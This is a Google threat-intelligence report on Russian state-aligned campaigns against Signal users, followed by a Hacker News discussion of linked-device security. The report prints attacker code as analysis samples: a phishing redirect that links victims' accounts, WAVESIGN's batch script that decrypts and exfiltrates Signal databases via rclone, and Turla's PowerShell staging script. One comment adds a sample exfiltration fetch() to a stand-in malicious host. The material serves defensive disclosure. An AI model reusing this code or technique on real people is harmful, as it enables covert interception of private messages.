Multiple Russia-aligned threat actors actively targeting Signal Messenger

2025-02-1914:05836289cloud.google.com

Russia state-aligned threat actors target Signal Messenger accounts used by individuals of interest to Russia's intelligence services.

Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war.

Signal's popularity among common targets of surveillance and espionage activity—such as military personnel, politicians, journalists, activists, and other at-risk communities—has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats.

We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.

The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise.

  • In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing instructions from the Signal website.

  • In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military.

  • Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU) has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation.

Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time.

UNC5792: Modified Signal Group Invites

To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792 (which partially overlaps with CERT-UA's UAC-0195) has altered legitimate "group invite" pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim's Signal account.

  • In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite.

  • In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig1-signal.max-1600x1600.png
https://storage.googleapis.com/gweb-cloudblog-publish/images/fig1-signal.max-1600x1600.png

Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain "signal-groups[.]tech"

function doRedirect() {
if (window.location.hash) {
var redirect = "sgnl://signal.group/" + window.location.hash
document.getElementById('go-to-group').href = redirect
window.location = redirect
} else {
document.getElementById('join-button').innerHTML = "No group found."
window.onload = doRedirect

Figure 2: Typical legitimate group invite code for redirection to a Signal group

function doRedirect() {
var redirect = 'sgnl://linkdevice
uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D
pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B'
//redirect=encodeURIComponent(redirect)
document.getElementById('go-to-group').href = redirect
window.location = redirect
window.onload = doRedirect

Figure 3: Example of UNC5792 modified redirect code used to link the victim's device to an actor-controlled Signal instance

UNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including:

  • Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4)

  • Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5)

  • In earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal (Figure 6)

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig4-signal.max-1200x1200.png
https://storage.googleapis.com/gweb-cloudblog-publish/images/fig4-signal.max-1200x1200.png

Figure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain "signal-confirm[.]site"

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig5-signal.max-1200x1200.png
https://storage.googleapis.com/gweb-cloudblog-publish/images/fig5-signal.max-1200x1200.png

Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at "teneta.add-group[.]site". The page invites the user to "Sign in to Signal" (Ukrainian: "Авторизуватись у Signal"), which in turn displays a QR code linked to an UNC4221-controlled Signal instance.

https://storage.googleapis.com/gweb-cloudblog-publish/images/fig6-signal.max-1400x1400.png
https://storage.googleapis.com/gweb-cloudblog-publish/images/fig6-signal.max-1400x1400.png

Figure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host

Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser's GeoLocation API. In general, we expect to see secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations.

Wider Russian and Belarusian Efforts to Steal Messages From Signal

Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices.

  • APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim's Signal database and exfiltrate those most recent messages using Rclone (Figure 7).

  • As reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel and attributed by the respective organizations to Sandworm, is designed to recursively search for a list of file extensions including the local database for a series of messaging applications, including Signal, on Android devices.

  • Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).

  • Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9).

if %proflag%==1 (
    C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
    copy /y %new% C:\ProgramData\Signal\Storage\Signal\sqlorig\db.sqlite
    C:\ProgramData\Signal\Storage\rc.exe copy -P -I --log-file=C:\ProgramData\Signal\Storage\rclog.txt --log-level INFO C:\ProgramData\Signal\Storage\Signal\sqlorig si:SignalFresh/sqlorig
    del C:\ProgramData\Signal\Storage\Signal\log*
    rmdir /s /q C:\ProgramData\Signal\Storage\sql
    move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql
) ELSE (

    C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
    C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%old_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;"
    C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL
    C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%new_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;"
    C:\ProgramData\Signal\Storage\sqldiff.exe --primarykey --vtab %old_dec% %new_dec% > %diff_name%
    del /s %old_dec% %new_dec%

    rmdir /s /q C:\ProgramData\Signal\Storage\sql
    move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql

    powershell -Command "move C:\ProgramData\Signal\Storage\log.tmp C:\ProgramData\Signal\Storage\Signal\log$(Get-Date -f """ddMMyyyyHHmmss""").tmp"
)

Figure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages

$TempPath = $env:tmp
$TempPath = $env:temp

$ComputerName = $env:computername
$DFSRoot = "\\redacted"
$RRoot = $DFSRoot + "resource\"

$frand = Get-Random -Minimum 1 -Maximum 10000

Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append
Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append

Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append
Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append


$file1 = $ComputerName + "_" + $frand + "sig.zip"
$zipfile = $TempPath + "\" + $file1
$resfile = $RRoot + $file1
Compress-Archive -Path "C:\Users\..\AppData\Roaming\SIGNAL\config.json" -DestinationPath $zipfile
Copy-Item -Path $zipfile -Destination $resfile -Force
Remove-Item -Path $zipfile -Force

Figure 8: PowerShell script used by Turla to exfiltrate Signal messages

C:\Windows\system32\cmd.exe /C cd %appdata% && robocopy 
"%userprofile%\AppData\Roaming\Signal" C:\Users\Public\data\signa /S

Figure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration

The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity.

As reflected in wide ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target's unlocked device. Equally important, this threat is not only limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence's recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.  

Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including:

  • Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

  • Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps.

  • Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

  • Audit linked devices regularly for unauthorized devices by navigating to the "Linked devices" section in the application's settings.

  • Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action.

  • If available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.

  • iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface.

To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

See Table 1 for a sample of relevant indicators of compromise.

Actor

Indicator of Compromise

Context 

UNC5792

e078778b62796bab2d7ab2b04d6b01bf

Example of altered group invite HTML code 

add-signal-group[.]com

add-signal-groups[.]com

group-signal[.]com

groups-signal[.]site

signal-device-off[.]online

signal-group-add[.]com

signal-group[.]site

signal-group[.]tech

signal-groups-add[.]com

signal-groups[.]site

signal-groups[.]tech

signal-security[.]online

signal-security[.]site

signalgroup[.]site

signals-group[.]com

Fake group invite phishing pages

UNC4221

signal-confirm[.]site

confirm-signal[.]site

Device-linking instructions phishing page

signal-protect[.]host

Fake Signal security alert 

teneta.join-group[.]online

teneta.add-group[.]site

group-teneta[.]online

helperanalytics[.]ru

group-teneta[.]online

teneta[.]group

group.kropyva[.]site

Fake Kropyva group invites 

APT44

150.107.31[.]194:18000

Dynamically generated device-linking QR code provisioned by APT44

a97a28276e4f88134561d938f60db495

b379d8f583112cad3cf60f95ab3a67fd

b27ff24870d93d651ee1d8e06276fa98

WAVESIGN batch scripts 

Table 1: Relevant indicators of compromise

See Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages.

Threat Actor 

Tactic 

Technique

UNC5792

Linked device

Remote phishing operations using fake group invites to pair a victim's Signal messages to an actor-controlled device

UNC4221

Linked device

Remote phishing operations using fake military web applications and security alerts to pair a victim's Signal messages to an actor-controlled device

APT44

Linked device

Close-access physical device exploitation to pair a victim's Signal messages to an actor-controlled device

Signal Android database theft

Android malware (Infamous Chisel) tailored to exfiltrate Signal database files

Signal Desktop database theft 

Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone

Turla

Signal Desktop database theft 

Post-compromise activity in Windows environments

UNC1151

Signal Desktop database theft 

Use of Robocopy to stage Signal Desktop file directories for exfiltration

Table 2: Summary of observed threat activity targeting Signal messages
Posted in


Read the original article

Comments

  • By vetrom 2025-02-1918:483 reply

    Signal (and basically any app) with a linked devices workflow has been risky for awhile now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

    I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

    It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):

        "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"

    • By diputsmonro 2025-02-1919:545 reply

      If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.

      Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.

      Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.

      • By vetrom 2025-02-1920:522 reply

        No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.

        That leaves you with the only remedy for a signal account that has accepted a link to a 'bad device' being to burn the whole account. (maybe rotating safety numbers/keys would be sufficient, i am uncertain there) -- If you can prove the malicious link was only a link, then yeah, the attack i described is incomplete, but the issues in general with linked devices and remedies described are the important bits, I think.

        • By inor0gu 2025-02-1921:071 reply

          That's not what the attack does tho - they have access to your private key so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.

          You can always see how many devices a user has: they have a unique integer id so if I wanna send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly than that is an oversight for sure, but I don't think it's the case anymore.

          Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the save view on your account (keys), which is why key transparency is such an important feature.

          • By rendaw 2025-02-202:48

            That sounds exactly like what GP wrote.

        • By UltraSane 2025-02-1922:07

          That is really quite bad.

      • By vlovich123 2025-02-1921:041 reply

        It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security requirements you'd think it would and there's a phishing attack to make scanning a QR code trigger a device link (which seems really really bad if the user doesn't even have to take much action)

        • By inor0gu 2025-02-1921:162 reply

          Your phone (primary device) and the linked ones have to share the IK since that is the "root of trust" for you account: with that you generate new device keys, renew them and so on.

          Those keys are backed by Keystore on Android, and some similar system on Windows/Linux, i'd assume the same for MacOS/iOS (but I don't know the details) so it's not as simple as just having access to your laptop, they'd need at least root.

          Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.

          • By vlovich123 2025-02-206:101 reply

            I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn’t (e.g. the server shouldn’t be forwarding new messages to). That’s a design decision Signal made but clearly it’s one that leaves you open to harm. Moreover, it’s a dangerous decision because after obtaining the IK in some way (e.g. stolen device) you’re able to then essentially surreptitiously take over the account without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices and that Signal discounted this as not part of their threat model to me suggest their threat model has an intentional or unintentional hole; second-hand devices that aren’t wiped are common & jail breaks exist.

            This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.

            • By inor0gu 2025-02-208:16

              Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.

              The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried to communicate with them, since each device will establish unique keys signed by that IK, so it isn't as bad as having invisible devices that you'd never aware of. That of course relies on you being able to ensure the server is honest, and consistent, but this is already work in progress they are doing.

              I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.

          • By vlovich123 2025-02-203:38

            I would be surprised if there aren’t ways to design it cryptographically to ensure that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that is a known weakness that Signal has dismissed in the past.

      • By reactordev 2025-02-1920:551 reply

        “Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.

        Background services on devices has been a thing for a while too. Install an app (which you grant all permissions to when asked) and bam, a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc

        • By noname120 2025-02-1922:451 reply

          How is that related in any way to Signal?

          • By reactordev 2025-02-1922:56

            My point is that anything you install on your device is a vector. Can install MITM attacks. Can read your data, etc. Sidecar attacks.

            This was classic phishing though

      • By josh2600 2025-02-1920:46

        This is my read as well. Just double clicking here.

    • By inor0gu 2025-02-1920:58

      The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.

      Outside of lab settings, the only way to do that is: - (1) you get root access to the user's device - (2) you compromise a recent chat backup

      The campaign Google found is akin to phishing, so not as problematic on a technical level. How do you warn someone they might be doing something dangerous in an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).

    • By tomrod 2025-02-1923:071 reply

      If one doesn't use the linked device feature, does that impact this threat surface?

      • By inor0gu 2025-02-1923:34

        About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.

        The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.

  • By parhamn 2025-02-1921:549 reply

    One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

    The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.

    And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.

    You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.

    I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

    Sometimes it all feels pointless (besides encrypted storage).

    I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

    • By inor0gu 2025-02-1922:051 reply

      You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicone, through the OS and all the way to how packets are forwarded from you to the person on the other end.

      This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.

      I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.

      A few examples: - certificate transparency logs so your traffic is not MitM'ed - reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality) - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's

      • By parhamn 2025-02-1922:152 reply

        > This makes that entire goal moot

        I agree. Perhaps it's why I find the discussions like nonce-lengths and randomness sources almost insane (in the sense of willfully missing the forrest from the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.

        • By inor0gu 2025-02-1922:271 reply

          I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.

          > If you're building a chip to generate prime numbers I do surely hope you know how to select randomness or make constant time & branch free algorithms, just like an engineer designing elevators better know what should be the tensile strength of the cable it'll use. In either cases, it's mumbo jumbo for me, and I just need to get on with my day.

          Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.

          • By parhamn 2025-02-203:06

            I almost find it worse. Using your analogy its akin to doing atomic simulations on the elevator cable quality, but the elevator car is missing a bottom/floor.

        • By 542354234235 2025-02-2017:24

          But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how/why. If you are terrorizing and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend and would have a lawyer go through discovery, you are probably safe.

    • By BrenBarn 2025-02-207:281 reply

      I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)

      There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

      I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

      • By Cyphase 2025-02-207:401 reply

        At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.

        • By BrenBarn 2025-02-2010:36

          How does giving the platform the keys guarantee legal consequences for them if they use the keys to read your messages?

    • By lmm 2025-02-201:15

      > Sometimes it all feels pointless

      Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

      > I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

      There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

    • By redleader55 2025-02-1923:41

      I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust that confirms beyond doubt the provenience of the entity (phone + os + app) that you interact with.

      Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.

      The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

      A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.

      All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.

    • By MediumOwl 2025-02-2013:29

      > I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

      I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.

      The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

    • By solarkraft 2025-02-208:49

      > "E2E encryption" really requires the client to be built and verified by the end user

      We probably agree that this is infeasible for the vast majority of people.

      Luckily reproducible builds somewhat sidestep this in a more practical way.

    • By edgineer 2025-02-206:19

      I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

      With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

      [0] https://github.com/maqp/tfc

    • By aembleton 2025-02-209:11

      > "E2E encryption" really requires the client to be built and verified by the end user

      But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

      At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

    • By SheinhardtWigCo 2025-02-1922:071 reply

      It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

      Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

      tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

      • By parhamn 2025-02-1922:09

        > tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

        This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).

  • By untech 2025-02-1917:543 reply

    It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.

    • By forkerenok 2025-02-1919:261 reply

      The article says they phish people into linking adversarial devices to their Signal:

      > [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

      • By Austiiiiii 2025-02-1921:411 reply

        There's a new feature to sync old messages that seems like it could potentially make that attack vector ten times worse:

        https://www.bleepingcomputer.com/news/security/signal-will-l...

        Would a malicious URL be able to activate this feature as part of the request?

        • By inor0gu 2025-02-1921:50

          Probably not, in any normal case a secondary device shouldn't have that kind of authority to dictate.

          It is more concerning if the toggle is on by default and then you carelessly press next (on this or some other kind of phish).

    • By mmooss 2025-02-1918:523 reply

      Is this serious?

      It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).

      The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me I would expect someone is working on how to secure them enough that even Russian intelligence doesn't have an effective exploit.

      The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.

      • By hnlmorg 2025-02-1919:16

        I seem to recall uploaded selfies being a frequent source of problems. For example: https://www.rferl.org/a/trench-selfies-tracking-russia-milit...

      • By newsclues 2025-02-1919:033 reply

        Phones aren’t secure but are more secure than the standard radios most have access to.

        Encrypted milspec comms aren’t the standard in a massive war.

        It’s weird but discord, signal and some mapping apps on smartphones are how this war is being fought.

        • By int_19h 2025-02-2022:14

          > Encrypted milspec comms aren’t the standard in a massive war.

          It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.

          Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.

